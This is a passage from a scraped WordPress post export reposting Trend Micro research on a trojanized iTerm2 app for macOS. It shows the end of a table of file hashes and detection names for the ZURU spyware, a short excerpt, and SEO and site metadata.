width=\"157\">\n<p><i>libcrypto.2.dylib<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>4e8287b61b0269e0d704c6d064cb584c1378e9b950539fea366ee304f695743f<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>libcrypto.2.dylib<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>8db4f17abc49da9dae124f5bf583d0645510765a6f7256d264c82c2b25becf8b<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>libcrypto.2.dylib<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>62cae3c971ed01c61454e4c3d9a8439cdcb409a8e1c5641e5c7c4ac7667cb5e5<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>libcrypto.2.dylib<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>aba7c61d2c16cdae17785a38b070df57aa3009f00686881642be31a589fabe0a<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>libcrypto.2.dylib<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>af2cb957387b7c4b0c5c9fa24a711988c9e8802e758622b321c9bdc5720120d2<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>libcrypto.2.dylib<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>e8184e1169373e2d529f23b9842f258dddc1d24c77ced0d12b08959967dfadef<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>libcrypto.2.dylib<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>g.py<\/i><\/p>\n<\/td>\n<td width=\"452\" valign=\"bottom\" readability=\"5\">\n<p>ffb0a802fdf054d4988d68762d9922820bdc3728f0378fcd6c4ed28c06da5cf0<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.Python.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"21.940928270042\">\n<div class=\"responsive-table-wrap\" readability=\"6.1708860759494\">\n<p><span class=\"body-subhead-title\">MITRE Tactics, Techniques, and Procedures (TTPs)<\/span><\/p>\n<p><center><br \/>\n<\/center> <\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <!-- Go to www.addthis.com\/dashboard to customize your tools --> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We go into more detail about a fake version of the iTerm2 app that downloads and runs malware, detected by Trend Micro as TrojanSpy.Python.ZURU.A, which collects private data from a victim\u2019s machine. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":43145,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9513,9509,9535],"class_list":["post-43144","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-malware","tag-trend-micro-research-research","tag-trend-micro-research-web"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-09-30T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/09\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1376\" \/>\n\t<meta property=\"og:image:height\" content=\"968\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst\",\"datePublished\":\"2021-09-30T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/\"},\"wordCount\":2151,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/09\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Research\",\"Trend Micro Research : Web\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/\",\"name\":\"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/09\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png\",\"datePublished\":\"2021-09-30T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/09\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/09\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png\",\"width\":1376,\"height\":968},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/","og_locale":"en_US","og_type":"article","og_title":"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2021-09-30T00:00:00+00:00","og_image":[{"width":1376,"height":968,"url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/09\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png","type":"image\/png"}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst","datePublished":"2021-09-30T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/"},"wordCount":2151,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/09\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Malware","Trend Micro Research : Research","Trend Micro Research : Web"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/","url":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/","name":"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/09\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png","datePublished":"2021-09-30T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/09\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/09\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png","width":1376,"height":968},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/43144","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=43144"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/43144\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/43145"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=43144"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=43144"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=43144"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}